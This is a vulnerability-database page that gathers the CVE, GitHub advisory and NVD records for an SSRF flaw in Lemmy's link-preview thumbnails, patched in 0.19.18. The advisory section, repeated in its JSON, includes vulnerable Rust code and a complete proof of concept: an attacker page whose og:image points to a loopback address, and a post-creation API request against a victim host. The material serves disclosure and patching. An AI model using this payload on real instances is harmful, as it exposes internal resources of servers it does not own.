Vulnerability-Lookup

CVE-2026-42181 (GCVE-0-2026-42181)

Vulnerability from cvelistv5 – Published: 2026-05-08 19:26 – Updated: 2026-05-08 19:26

Title

Lemmy: SSRF and internal image disclosure in post link metadata via unvalidated og:image

Summary

Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction. As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users. This issue has been patched in version 0.19.18.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/LemmyNet/lemmy/security/adviso…	x_refsource_CONFIRM
	https://github.com/LemmyNet/lemmy/releases/tag/0.19.18	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	LemmyNet	lemmy	Affected: < 0.19.18

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "lemmy",
          "vendor": "LemmyNet",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.19.18"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction. As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users. This issue has been patched in version 0.19.18."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-08T19:26:07.763Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq"
        },
        {
          "name": "https://github.com/LemmyNet/lemmy/releases/tag/0.19.18",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/LemmyNet/lemmy/releases/tag/0.19.18"
        }
      ],
      "source": {
        "advisory": "GHSA-h6hf-9846-xwrq",
        "discovery": "UNKNOWN"
      },
      "title": "Lemmy: SSRF and internal image disclosure in post link metadata via unvalidated og:image"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42181",
    "datePublished": "2026-05-08T19:26:07.763Z",
    "dateReserved": "2026-04-25T01:53:21.582Z",
    "dateUpdated": "2026-05-08T19:26:07.763Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-42181",
      "date": "2026-05-09",
      "epss": "0.00028",
      "percentile": "0.08134"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42181\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-08T20:16:31.160\",\"lastModified\":\"2026-05-08T20:16:31.160\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction. As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users. This issue has been patched in version 0.19.18.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"references\":[{\"url\":\"https://github.com/LemmyNet/lemmy/releases/tag/0.19.18\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

GHSA-H6HF-9846-XWRQ

Vulnerability from github – Published: 2026-04-24 15:21 – Updated: 2026-05-04 20:33

Summary

Lemmy has SSRF and internal image disclosure in post link metadata via unvalidated og:image

Details

Summary

Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction.

As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users.

Details

The metadata fetch logic applies an internal-address check only to the initial post URL. After HTML parsing, extract_opengraph_data() accepts absolute og:image values and returns them as-is. Later, generate_post_link_metadata() passes that second-hop image URL into generate_pictrs_thumbnail(), which instructs local pict-rs to fetch it through image/download?url=....

This creates a two-stage source-to-sink chain where the first URL is constrained, but the security boundary is bypassed through an unvalidated secondary resource.

Core vulnerable code path:

// crates/api_common/src/request.rs
let metadata = match &post.url {
  Some(url) => fetch_link_metadata(url, &context, false).await.unwrap_or_default(),
  _ => Default::default(),
};

// crates/api_common/src/request.rs
let og_image = page
  .opengraph
  .images
  .first()
  .and_then(|ogo| url.join(&ogo.url).ok());

// crates/api_common/src/request.rs
let thumbnail_url = if let (true, Some(url)) = (allow_generate_thumbnail, image_url.clone()) {
  generate_pictrs_thumbnail(&url, &context).await.ok().map(Into::into).or(image_url)
} else {
  image_url.clone()
};

// crates/api_common/src/request.rs
let fetch_url = format!(
  "{}image/download?url={}&resize={}",
  pictrs_config.url,
  encode(image_url.as_str()),
  context.settings().pictrs_config()?.max_thumbnail_size
);

These snippets show that only the outer page URL is checked, while the extracted og:image value becomes a server-side fetch target without an equivalent internal-address guard.

PoC

Prerequisites:

The attacker has a valid low-privileged account.
The instance uses the default link preview storage mode.
The attacker can post a link to a community they can access.

Practical reproduction flow:

Host a public HTML page under attacker control.
Add an Open Graph image tag whose value points to an internal image URL reachable from the Lemmy host, such as http://127.0.0.1:8081/internal.png.
Create a Lemmy post whose url is the attacker-controlled page.
Observe Lemmy fetch the public page, extract og:image, and then fetch the internal image through pict-rs.
Observe the created post receive a local thumbnail URL, demonstrating that the internal image was retrieved and cached.

Complete PoC attacker page:

<html><head>
<meta property="og:image" content="http://127.0.0.1:8081/internal.png">
</head><body>x</body></html>

Complete PoC request:

POST /api/v3/post HTTP/1.1
Host: victim.example
Authorization: Bearer <low-priv-jwt>
Content-Type: application/json

{
  "name": "thumb-ssrf",
  "community_id": 1,
  "url": "https://attacker.example/og.html",
  "body": null,
  "alt_text": null,
  "honeypot": null,
  "nsfw": false,
  "language_id": null,
  "custom_thumbnail": null
}

Outcome:

The post creation request succeeds.
The internal image endpoint receives a request from the Lemmy server.
The created post is updated with a local thumbnail_url, indicating that the internal image was fetched and cached.

Impact

This issue upgrades an attacker-controlled external page into an internal image fetch primitive. It can be used to retrieve internal image resources, expose content that is otherwise reachable only from the application host, and publish those internal resources through Lemmy's own thumbnail serving path.

Because the vulnerable mode is the documented default behavior for link previews, the issue is relevant even without non-default privacy settings.

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "lemmy_api_common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.19.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42181"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-24T15:21:58Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nLemmy fetches metadata for user-supplied post URLs and, under the default `StoreLinkPreviews` image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted `og:image` URL is not subject to the same restriction.\n\nAs a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users.\n\n### Details\nThe metadata fetch logic applies an internal-address check only to the initial post URL. After HTML parsing, `extract_opengraph_data()` accepts absolute `og:image` values and returns them as-is. Later, `generate_post_link_metadata()` passes that second-hop image URL into `generate_pictrs_thumbnail()`, which instructs local pict-rs to fetch it through `image/download?url=...`.\n\nThis creates a two-stage source-to-sink chain where the first URL is constrained, but the security boundary is bypassed through an unvalidated secondary resource.\n\nCore vulnerable code path:\n\n```rust\n// crates/api_common/src/request.rs\nlet metadata = match \u0026post.url {\n  Some(url) =\u003e fetch_link_metadata(url, \u0026context, false).await.unwrap_or_default(),\n  _ =\u003e Default::default(),\n};\n```\n\n```rust\n// crates/api_common/src/request.rs\nlet og_image = page\n  .opengraph\n  .images\n  .first()\n  .and_then(|ogo| url.join(\u0026ogo.url).ok());\n```\n\n```rust\n// crates/api_common/src/request.rs\nlet thumbnail_url = if let (true, Some(url)) = (allow_generate_thumbnail, image_url.clone()) {\n  generate_pictrs_thumbnail(\u0026url, \u0026context).await.ok().map(Into::into).or(image_url)\n} else {\n  image_url.clone()\n};\n```\n\n```rust\n// crates/api_common/src/request.rs\nlet fetch_url = format!(\n  \"{}image/download?url={}\u0026resize={}\",\n  pictrs_config.url,\n  encode(image_url.as_str()),\n  context.settings().pictrs_config()?.max_thumbnail_size\n);\n```\n\nThese snippets show that only the outer page URL is checked, while the extracted `og:image` value becomes a server-side fetch target without an equivalent internal-address guard.\n\n### PoC\nPrerequisites:\n\n- The attacker has a valid low-privileged account.\n- The instance uses the default link preview storage mode.\n- The attacker can post a link to a community they can access.\n\nPractical reproduction flow:\n\n1. Host a public HTML page under attacker control.\n2. Add an Open Graph image tag whose value points to an internal image URL reachable from the Lemmy host, such as `http://127.0.0.1:8081/internal.png`.\n3. Create a Lemmy post whose `url` is the attacker-controlled page.\n4. Observe Lemmy fetch the public page, extract `og:image`, and then fetch the internal image through pict-rs.\n5. Observe the created post receive a local thumbnail URL, demonstrating that the internal image was retrieved and cached.\n\nComplete PoC attacker page:\n\n```html\n\u003chtml\u003e\u003chead\u003e\n\u003cmeta property=\"og:image\" content=\"http://127.0.0.1:8081/internal.png\"\u003e\n\u003c/head\u003e\u003cbody\u003ex\u003c/body\u003e\u003c/html\u003e\n```\n\nComplete PoC request:\n\n```http\nPOST /api/v3/post HTTP/1.1\nHost: victim.example\nAuthorization: Bearer \u003clow-priv-jwt\u003e\nContent-Type: application/json\n\n{\n  \"name\": \"thumb-ssrf\",\n  \"community_id\": 1,\n  \"url\": \"https://attacker.example/og.html\",\n  \"body\": null,\n  \"alt_text\": null,\n  \"honeypot\": null,\n  \"nsfw\": false,\n  \"language_id\": null,\n  \"custom_thumbnail\": null\n}\n```\n\nOutcome:\n\n- The post creation request succeeds.\n- The internal image endpoint receives a request from the Lemmy server.\n- The created post is updated with a local `thumbnail_url`, indicating that the internal image was fetched and cached.\n\n### Impact\nThis issue upgrades an attacker-controlled external page into an internal image fetch primitive. It can be used to retrieve internal image resources, expose content that is otherwise reachable only from the application host, and publish those internal resources through Lemmy\u0027s own thumbnail serving path.\n\nBecause the vulnerable mode is the documented default behavior for link previews, the issue is relevant even without non-default privacy settings.",
  "id": "GHSA-h6hf-9846-xwrq",
  "modified": "2026-05-04T20:33:48Z",
  "published": "2026-04-24T15:21:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LemmyNet/lemmy/commit/9ffe586dafac1a46acf17edf90e0165e5503b2f1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/LemmyNet/lemmy"
    },
    {
      "type": "WEB",
      "url": "https://join-lemmy.org/news/2026-04-20_-_Lemmy_Release_v0.19.18"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Lemmy has SSRF and internal image disclosure in post link metadata via unvalidated og:image"
}

FKIE_CVE-2026-42181

Vulnerability from fkie_nvd - Published: 2026-05-08 20:16 - Updated: 2026-05-08 20:16

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/LemmyNet/lemmy/releases/tag/0.19.18
	security-advisories@github.com	https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction. As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users. This issue has been patched in version 0.19.18."
    }
  ],
  "id": "CVE-2026-42181",
  "lastModified": "2026-05-08T20:16:31.160",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-08T20:16:31.160",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/LemmyNet/lemmy/releases/tag/0.19.18"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42181 (GCVE-0-2026-42181)

GHSA-H6HF-9846-XWRQ

Summary

Details

PoC

Impact

FKIE_CVE-2026-42181

Tags

Sightings

Nomenclature